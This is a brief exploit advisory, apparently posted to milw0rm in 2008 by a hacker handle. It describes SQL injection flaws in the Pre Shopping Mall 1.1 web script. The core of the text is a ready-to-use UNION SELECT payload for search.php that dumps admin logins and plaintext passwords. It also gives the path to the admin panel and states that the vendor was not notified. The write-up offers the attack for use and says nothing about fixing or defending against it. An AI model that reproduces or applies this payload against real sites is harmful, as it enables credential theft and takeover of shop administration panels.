--==+ Pre Shopping Mall 1.1 SQL Injection Vulnerablity +==--
Discovered By: t0pP8uZz
Discovered On:
Script Download: http://preproject.com
Vendor Has Not Been Notified!
Pre Shopping Mall suffers from multiple remote sql injection bugs.
this allows the remote attacker to pull admin credentials from the database, since the admin details are in plaintext
this makes it easy for the attacker to gain access to the administarion panel.
SQL Injection:
ADMIN: http://site.com/emall/search.php?search='/**/and/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,3,CONCAT(login,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16/**/FROM/**/admin/*
admin login is at /admin/
injection is multi-row, so it will pull all rows from a table.
GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !
--==+ Pre Shopping Mall 1.1 SQL Injection Vulnerablity +==--
# milw0rm.com [2008-05-06]